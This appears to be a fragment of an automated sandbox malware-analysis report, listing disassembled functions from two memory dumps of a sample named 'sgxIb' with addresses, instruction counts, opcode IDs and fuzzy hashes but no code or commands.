                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db6006f97a9842f959faa29eaba390e5364984ea68f32b514924fd10793ac7d1
                                                                                                            • Instruction ID: a9bb96f5a49104aa88b1d2f31fc777970a87118c02eba1b3e28e3c43c79ea78e
                                                                                                            • Opcode Fuzzy Hash: db6006f97a9842f959faa29eaba390e5364984ea68f32b514924fd10793ac7d1
                                                                                                            • Instruction Fuzzy Hash: FA227E70E102098FDF64DB68D5A07ADB7F2EB95314F258826E909EB391DB34DC81CB52
                                                                                                            Function 068411F8 Relevance: .3, Instructions: 291COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 60c793c18172ceb13112da50b3ae18a23ec9e800e5d96646a85eac0bd07cd606
                                                                                                            • Instruction ID: 1ea4d7c158b96ead07cf393e24c6650fcfd8a6b7fa58357b3fa83c746d881c64
                                                                                                            • Opcode Fuzzy Hash: 60c793c18172ceb13112da50b3ae18a23ec9e800e5d96646a85eac0bd07cd606
                                                                                                            • Instruction Fuzzy Hash: 33B1A334E1021D8FDF61EB68C844BBEBBB6EB45314F114965E64ADB290C734DD81CB91
                                                                                                            Function 06840E20 Relevance: .3, Instructions: 285COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e2af0e161ccef8f021c041c2219086311580813bae60a8b5e90804219f55b67
                                                                                                            • Instruction ID: d55fef441271530def5edd01df01868aad4e0d65747b7ed25ae435d3881a8292
                                                                                                            • Opcode Fuzzy Hash: 3e2af0e161ccef8f021c041c2219086311580813bae60a8b5e90804219f55b67
                                                                                                            • Instruction Fuzzy Hash: F6A1C771E012098FDB60EB68C8807AFB7F5EF85310F208976E659DB381D675EC428795
                                                                                                            Function 06856308 Relevance: .2, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 298d8185951c899545165c892a7ee6735857e52f47955781901c1a538f2fe512
                                                                                                            • Instruction ID: 3a883086a8bce4978978ee153e3037b97748793ac802e9f7fc1b2a909a85f951
                                                                                                            • Opcode Fuzzy Hash: 298d8185951c899545165c892a7ee6735857e52f47955781901c1a538f2fe512
                                                                                                            • Instruction Fuzzy Hash: 91610471F001214FCF109A7DC8846AFBAD7AFC4224B66443AE80EDB360EE65DD4287D2
                                                                                                            Function 068543B9 Relevance: .2, Instructions: 223COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e40e23d0b4f43c4481f88a62e5a1c3493b25e53b77b3d65ad907e3db51e7e960
                                                                                                            • Instruction ID: df2f2f22a3774caf17e5089a02b97041deb7098dbedb7f4fe67c4b8729adac3d
                                                                                                            • Opcode Fuzzy Hash: e40e23d0b4f43c4481f88a62e5a1c3493b25e53b77b3d65ad907e3db51e7e960
                                                                                                            • Instruction Fuzzy Hash: 56813D34B006099FDF54DFA8D5947AEB7F2AF89304F118429D90ADB394EB34EC868B51
                                                                                                            Function 068543C8 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f2f0898a593d3b2c9529b6ffb6b51fe9e2b56a947daa99fdb9a62203e62661e
                                                                                                            • Instruction ID: f6d9686fce2b45fbb2ea7111638a4e1f77c5fa032cc4bb7870d8013c18a67a0b
                                                                                                            • Opcode Fuzzy Hash: 0f2f0898a593d3b2c9529b6ffb6b51fe9e2b56a947daa99fdb9a62203e62661e
                                                                                                            • Instruction Fuzzy Hash: D1813E30B006099FDF54DFA8D59479EB7F2AB85304F118429D90ADB394EF34EC868B51
                                                                                                            Function 068546D4 Relevance: .2, Instructions: 214COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 342433e717433b83f3321094e674491c01057d1634b2c98e41a70f18a6c12a3c
                                                                                                            • Instruction ID: 879b74da55b355b93cb97a1ac2aec5aba8b59a6e4c67b81986d7c50f77e30d1d
                                                                                                            • Opcode Fuzzy Hash: 342433e717433b83f3321094e674491c01057d1634b2c98e41a70f18a6c12a3c
                                                                                                            • Instruction Fuzzy Hash: 45914D34E106198BDF60DF68C890B9DB7B1FF89300F208995D54DFB295EB70AA858B91
                                                                                                            Function 068546E8 Relevance: .2, Instructions: 210COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d4c1b222073bb4670beaa886e60b860bea57e6d175862f408fee62b06f0d1a4
                                                                                                            • Instruction ID: 3a7f2442c48a1b6660622e1253b436f80505132571fd72eedd61e7073feca7b1
                                                                                                            • Opcode Fuzzy Hash: 1d4c1b222073bb4670beaa886e60b860bea57e6d175862f408fee62b06f0d1a4
                                                                                                            • Instruction Fuzzy Hash: 1E913A34E106198BDF60DF68C880B9DB7B1FF89300F208699D549FB355EB70AA858F91
                                                                                                            Function 0685F039 Relevance: .2, Instructions: 206COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 82548f131f9e7273950cef76714a4c24e5d5ad560ccfa8cd6d35cb046b508572
                                                                                                            • Instruction ID: 8885a661f4dd14d1624a0fad7b9392db6b380e21bcf93b8ac70d18c492173f20
                                                                                                            • Opcode Fuzzy Hash: 82548f131f9e7273950cef76714a4c24e5d5ad560ccfa8cd6d35cb046b508572
                                                                                                            • Instruction Fuzzy Hash: 78714E74A002198FCB54DFA8D980AADBBF6FF88304F25842AD509DB355DB30E946CF51
                                                                                                            Function 0685F048 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d85c24cb2f56e7e952d85c58161f9f34aa9378c778f315512999dee0ceff8920
                                                                                                            • Instruction ID: 2cb485c2d2b5c7c82cb631e471fa447627b4ba8defe3f2ca17139ebb35cd8d2b
                                                                                                            • Opcode Fuzzy Hash: d85c24cb2f56e7e952d85c58161f9f34aa9378c778f315512999dee0ceff8920
                                                                                                            • Instruction Fuzzy Hash: A6713A74A002199FCB54DFA8D980AAEBBF6FF88304F258429E509DB355DB30E946CF51
                                                                                                            Function 06842823 Relevance: .2, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0a2294aa91f7bf3c05898577d09c471f4b6bb8de78c4af15af140627c808adbf
                                                                                                            • Instruction ID: d0e33734e548a3172bfe23db6f578208a69ee66090040fb61d397c8588b405a1
                                                                                                            • Opcode Fuzzy Hash: 0a2294aa91f7bf3c05898577d09c471f4b6bb8de78c4af15af140627c808adbf
                                                                                                            • Instruction Fuzzy Hash: 9C51BE34B102188FCB55FF78D9909AEBBE3FFC8204B148529E805E7354DB34AD068B51
                                                                                                            Function 06841500 Relevance: .2, Instructions: 173COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24fc89722016cbac07b127ec5820485f1fd74d893543c19d9ca5ee458c5baba7
                                                                                                            • Instruction ID: 44f55c2b7bc85bc4cc00bad0249da9fcdbdda7b15cce01792bd1de939a6ec8ce
                                                                                                            • Opcode Fuzzy Hash: 24fc89722016cbac07b127ec5820485f1fd74d893543c19d9ca5ee458c5baba7
                                                                                                            • Instruction Fuzzy Hash: 4E518075E002188FCB60EFA8C4847AEBBF5EF44310F158529DA4AEB340D735D945CBA1
                                                                                                            Function 0685FCC9 Relevance: .2, Instructions: 173COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 73fac36effcc1eafe97792a9e6334386eb7bd4d321d1f3fd6f243c3f6c32d0bc
                                                                                                            • Instruction ID: e78312b9bcc3545a794e95f2744c0296d4511f8c4f4120df6f1be2f4a2ed9ce7
                                                                                                            • Opcode Fuzzy Hash: 73fac36effcc1eafe97792a9e6334386eb7bd4d321d1f3fd6f243c3f6c32d0bc
                                                                                                            • Instruction Fuzzy Hash: F351DF31E002058FDB54AB78E9446ADBBB2FB84316F118869EA0ADB291DF358C45CF91
                                                                                                            Function 0685FA78 Relevance: .2, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7efe43112fcb4a7d037e406e8d24a2bd87a0b4eb838242669d27641957466ad6
                                                                                                            • Instruction ID: 9995a435b21e3c52fbc8e9dc435533a7ef968a9b93964d5e4dfbd8e5c8b141a6
                                                                                                            • Opcode Fuzzy Hash: 7efe43112fcb4a7d037e406e8d24a2bd87a0b4eb838242669d27641957466ad6
                                                                                                            • Instruction Fuzzy Hash: A251B474B202148BEF606678D95476F3A9AE789315F21442AEB0ED7794CF3CCC419BA2
                                                                                                            Function 0685FA88 Relevance: .2, Instructions: 163COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8b424cb65f88dd37ee0f893dd070d70629d140ce4d37329a1ee60b18b6a93c02
                                                                                                            • Instruction ID: ffe3be049ce03ccb7ff2f62793f700b7e5d97f7dc1f3ca29dab7f7f0d5cd927f
                                                                                                            • Opcode Fuzzy Hash: 8b424cb65f88dd37ee0f893dd070d70629d140ce4d37329a1ee60b18b6a93c02
                                                                                                            • Instruction Fuzzy Hash: 5F51E474B202248BEF60666CD95472F369AE789315F214439EB0ED3794CF3CCC819BA2
                                                                                                            Function 06842440 Relevance: .1, Instructions: 143COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 988e8226974064610d3691a43a8238f2bf08bdeaed7fc6bcb16bcc2dbec1b219
                                                                                                            • Instruction ID: 9cb65dfb8fd880b52a8e7a569de8aec41eb2eb30596dcc0d2205627b288a37b7
                                                                                                            • Opcode Fuzzy Hash: 988e8226974064610d3691a43a8238f2bf08bdeaed7fc6bcb16bcc2dbec1b219
                                                                                                            • Instruction Fuzzy Hash: 95517B34E042198FCB54EBA4C5A479EB7F2FF84304F248529E905DB345EB74E986CB51
                                                                                                            Function 06842450 Relevance: .1, Instructions: 138COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 178184eee68fa51ec5925498848ac87bcbe279f415ab841cda5d693accea5f97
                                                                                                            • Instruction ID: 3f9bed58391358345e9f40da7e56a06da9292c7f9aa81ebe59f806f81fd585dd
                                                                                                            • Opcode Fuzzy Hash: 178184eee68fa51ec5925498848ac87bcbe279f415ab841cda5d693accea5f97
                                                                                                            • Instruction Fuzzy Hash: 6D518C30A002198FDB54EFA4C5A475EB7F2FF84304F248529E905DB385EB74E986CB91
                                                                                                            Function 06855538 Relevance: .1, Instructions: 126COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bcb858d1e981c48f3a211702ea79b3bf887132b4400293546c25e16bbada7ab8
                                                                                                            • Instruction ID: 64bad18d5a83d911d11c1ea7381eebbf2d9fb9fe3272706d64bfc8c4794c509b
                                                                                                            • Opcode Fuzzy Hash: bcb858d1e981c48f3a211702ea79b3bf887132b4400293546c25e16bbada7ab8
                                                                                                            • Instruction Fuzzy Hash: 5A414E71E007098FDF70CEA9D880AAFFBF2EB94310F11492AE656D7640D735E9458B92
                                                                                                            Function 06840FF0 Relevance: .1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4037aec9643d2cda8b90869277ceb4768d1cdabc112705ff32f6d276bb9700f
                                                                                                            • Instruction ID: d85688dbb4a249b0ef11e6cb7ec50bb55c254b831353a658c5e2ff251d7dd211
                                                                                                            • Opcode Fuzzy Hash: b4037aec9643d2cda8b90869277ceb4768d1cdabc112705ff32f6d276bb9700f
                                                                                                            • Instruction Fuzzy Hash: 3231B970B002085BEB509FADC881B6FB6E6FF88710F208925F559EB3C5C6719C418764
                                                                                                            Function 0685DA98 Relevance: .1, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 45f2c9335157baefd4bda035d9436c6ec9d1b41c459462f0e2313c7d56515997
                                                                                                            • Instruction ID: 6ad11ace822c2dabea9249805b0b42a259b85c8b95cf7e438a93a063422d157d
                                                                                                            • Opcode Fuzzy Hash: 45f2c9335157baefd4bda035d9436c6ec9d1b41c459462f0e2313c7d56515997
                                                                                                            • Instruction Fuzzy Hash: 2D319030E1031A8FCF65EF68C58069FBBB2FF85304F154929ED05E7644EB70A9468B95
                                                                                                            Function 06842A93 Relevance: .1, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d888725ef432ce09505277ca1fd9386ac90ce96ebb5455a2a7dfa99cebf4048
                                                                                                            • Instruction ID: dfca6e85c5887fd53a1896e229833bc36fc5a7c6296968638533d37ac7d873f2
                                                                                                            • Opcode Fuzzy Hash: 3d888725ef432ce09505277ca1fd9386ac90ce96ebb5455a2a7dfa99cebf4048
                                                                                                            • Instruction Fuzzy Hash: 4F313834A042098FCB54EB69D6A4AAE7BF1FF48215F144459E902EB365DB70AD40CB90
                                                                                                            Function 06842AA0 Relevance: .1, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 21ee5e9ff6ed70f0cc0e102adeb594d38873a6ddd5b1ad3ae6f363ce8523c7b1
                                                                                                            • Instruction ID: dcd2596c2ed1a4cd9d3f24f9787b35d828e9007a10692c7291e1110ec417e1d6
                                                                                                            • Opcode Fuzzy Hash: 21ee5e9ff6ed70f0cc0e102adeb594d38873a6ddd5b1ad3ae6f363ce8523c7b1
                                                                                                            • Instruction Fuzzy Hash: 90414934A042188FCB54EF69C594A9EBBF2FF48315F148459F906EB364DB70AD40CB94
                                                                                                            Function 06852080 Relevance: .1, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6259eff6fd561d71a80ae62a3f901d2171f11a55888859d9f152d38277e7e7a2
                                                                                                            • Instruction ID: 3fe71a24a562a3393c194c1fab83dbe639b8e0bc3e0ac23f10ec0dfb401aa1eb
                                                                                                            • Opcode Fuzzy Hash: 6259eff6fd561d71a80ae62a3f901d2171f11a55888859d9f152d38277e7e7a2
                                                                                                            • Instruction Fuzzy Hash: 40317A30E102059BCB59CF64D8A469EB7B2FF89310F148929EE06EB350DF31A946CB50
                                                                                                            Function 06852090 Relevance: .1, Instructions: 91COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6587ba999a0661a5352f843bf618331a5c52ab024e0b8a3e242172ad2247fdd4
                                                                                                            • Instruction ID: 52d7c71e54066fa1aac34bfc2e0166e1bf107a3f60c04e675d8323ab1300d2c4
                                                                                                            • Opcode Fuzzy Hash: 6587ba999a0661a5352f843bf618331a5c52ab024e0b8a3e242172ad2247fdd4
                                                                                                            • Instruction Fuzzy Hash: 32315B34E106059BCF59CF64D86469EB7B2BF89300F108929E906EB350DF71A946CB50
                                                                                                            Function 06853FC1 Relevance: .1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee6b3c928c82046d86a6c25cebe917b02365c894c10e40febd6295c501e94953
                                                                                                            • Instruction ID: b79417384159919110e1458ba2236cdee337a0c8afdbf5aaac5a712e1a9fd405
                                                                                                            • Opcode Fuzzy Hash: ee6b3c928c82046d86a6c25cebe917b02365c894c10e40febd6295c501e94953
                                                                                                            • Instruction Fuzzy Hash: F221AD35F006159FDB40DFA8D941BAEBBF5AB88314F10802AEA04E7744E730D942CB91
                                                                                                            Function 06853508 Relevance: .1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e8048730996bb2629020866eacdc9eac775668739fa7dd0f14d8286f6b3a0af
                                                                                                            • Instruction ID: 8695dfc60287524335162096de1d99b34716f0daf9dc49521a9876a75d6a6b07
                                                                                                            • Opcode Fuzzy Hash: 8e8048730996bb2629020866eacdc9eac775668739fa7dd0f14d8286f6b3a0af
                                                                                                            • Instruction Fuzzy Hash: D921E071E093644FDB16AB78C8511DEBFF1EF8A350F0548AAD945EB251EA30C944CB92
                                                                                                            Function 06853FD0 Relevance: .1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a20042b76570f919f468920dd5b834955f1c7bd457e7a9b0b33f279e2a53eb0
                                                                                                            • Instruction ID: 4229ef6001b537586b1beaee1d307778aa4efa47565ecbc4b42b6efceed61160
                                                                                                            • Opcode Fuzzy Hash: 8a20042b76570f919f468920dd5b834955f1c7bd457e7a9b0b33f279e2a53eb0
                                                                                                            • Instruction Fuzzy Hash: AB21AC75F00A159FDB40DFB9D981AAEBBF5EB48314F10802AEA05E7784EB31D941CB94
                                                                                                            Function 0685B038 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6ceea0e568a339521f61b61c69b8746afeefe81b9e21de876ca12dcbd0182259
                                                                                                            • Instruction ID: aa78e8614abb52c6abda8bd74f78026ea7af232ba0eb4ec90b2c7005850c9ec8
                                                                                                            • Opcode Fuzzy Hash: 6ceea0e568a339521f61b61c69b8746afeefe81b9e21de876ca12dcbd0182259
                                                                                                            • Instruction Fuzzy Hash: 93217C71D1076D8BCF64CFA9C85069EBBB5FF95340F11492AE909EB240EB70A845CB91
                                                                                                            Function 068405D6 Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2f31a48423c41c42ffbbe2512c0f6e65f12ee41fa11437689459ca9696291953
                                                                                                            • Instruction ID: da395372844e71dfa4b580d9adddbdda718a52c7308f709c099c2a24ef749114
                                                                                                            • Opcode Fuzzy Hash: 2f31a48423c41c42ffbbe2512c0f6e65f12ee41fa11437689459ca9696291953
                                                                                                            • Instruction Fuzzy Hash: 363106B5D012199FCB50DFA9D888ADEFBF4EF48310F14815AE948AB251D3749944CFA1
                                                                                                            Function 06840AB8 Relevance: .1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cbe7745cd9fb7058286299369da9b3d492a6d0b7a3db98c7521332b8edc0e6f
                                                                                                            • Instruction ID: f0b14354ee8edac61d62082b9c8818350205d935d7f640c34faf520942817051
                                                                                                            • Opcode Fuzzy Hash: 9cbe7745cd9fb7058286299369da9b3d492a6d0b7a3db98c7521332b8edc0e6f
                                                                                                            • Instruction Fuzzy Hash: 88112E357082541FCB466F78585016E7FA3DFC5250750846AEE0ACB3D2DE398E1687E5
                                                                                                            Function 06856E30 Relevance: .1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
